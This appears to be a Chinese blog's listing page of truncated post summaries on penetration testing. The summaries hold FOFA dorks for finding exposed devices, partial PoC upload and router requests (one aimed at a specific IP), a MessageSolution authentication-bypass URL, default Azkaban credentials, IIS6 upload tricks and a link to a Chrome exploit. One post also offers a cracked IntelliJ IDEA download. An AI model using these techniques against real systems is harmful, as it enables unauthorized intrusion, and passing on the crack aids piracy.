摘要:1.XMLDecoder 反序列化漏洞 cve-2017-10271/3506 影响版本10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2 受影响url ,在这个配置里面: C:\Oracle\Middleware\user_projects\doma 阅读全文
posted @ 2021-05-01 17:17 包子TT 阅读(21) 评论(0) 推荐(0) 编辑
摘要:一、下载安装 官网:https://www.jetbrains.com/idea/ 破解和软件包: 链接:https://pan.baidu.com/s/1QQqs78Nd4adqmwJ8wqnAgw 提取码:1234 遇到的问题: 破解的时候出现 This license BISACXYELK h 阅读全文
posted @ 2021-04-29 23:14 包子TT 阅读(16) 评论(0) 推荐(0) 编辑
摘要:1.文件解析漏洞 1.asp;.jpg 1.asp;.zip >解析成asp 2.目录解析漏洞 *.asp/目录下的所有文件解析成asp 3.iis6 文件上传漏洞 条件:1.开启webDAV 2.开启来宾写入修改权限 扫描是否存在漏洞: 利用上传脚本iiswrite.exe上传txt再mov 修改 阅读全文
posted @ 2021-04-20 11:20 包子TT 阅读(22) 评论(0) 推荐(0) 编辑
摘要:1.用goby扫描发现目标主机开发8081端口 2.访问 3.上网搜索azkaban 默认密码 (常见的管理员用户和密码) root root admin admin azkaban azkaban …… 果不其然 azkaban azkaban登陆上去了 4.接着打算找上传点或者命令执行点 百度找 阅读全文
posted @ 2021-04-17 17:40 包子TT 阅读(20) 评论(0) 推荐(0) 编辑
摘要:fofa: app="网康科技-下一代防火墙" poc: POST /directdata/direct/router HTTP/1.1 Host: 119.62.56.24:444 Connection: close Cache-Control: max-age=0 sec-ch-ua: "Goo 阅读全文
posted @ 2021-04-14 10:33 包子TT 阅读(95) 评论(0) 推荐(0) 编辑
摘要:fofa: body="和信下一代云桌面" 构造发送数据包: POST /Upload/upload_file.php?l=test HTTP/1.1 Host:x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe 阅读全文
posted @ 2021-04-14 10:12 包子TT 阅读(53) 评论(0) 推荐(0) 编辑
摘要:利用条件 关闭浏览器(chrome、edge等)沙盒 环境: win7/win10 chrome 89.0.4389.82(x64) 内存好像要够大:8/16g poc:https://github.com/r4j0x00/exploits/tree/master/chrome-exploit po 阅读全文
posted @ 2021-04-13 18:12 包子TT 阅读(196) 评论(0) 推荐(0) 编辑
摘要:fofa: title="MessageSolution Enterprise Email Archiving (EEA)" 访问后: exp: https://ip/authenticationserverservlet/ 直接登陆就可以了 阅读全文
posted @ 2021-04-13 10:12 包子TT 阅读(32) 评论(0) 推荐(0) 编辑
摘要:这个程序的源代码为调用一个加法函数,打印main用来定位主函数入口,目的是分析一个函数在调用的过程中汇编中的代码是怎么样的 打开反汇编,寻找到主函数; call 调用一个函数的过程是:push eip 先保存当前的eip指令指针,然后jum到函数的地址 下面这里是按F7进入到函数里面 一个函数的调用 阅读全文
posted @ 2021-04-11 13:22 包子TT 阅读(7) 评论(0) 推荐(0) 编辑
摘要:exe源码: #include <stdio.h> int main() { printf("test_ok!"); return 0; } 1.点击文件打开需要逆向的exe文件 2.寻址到main入口:ctrl+G 输入main跟随定位到main入口 3.这里的意思是把一个字符串的地址中的字符串p 阅读全文
posted @ 2021-04-04 23:54 包子TT 阅读(14) 评论(0) 推荐(0) 编辑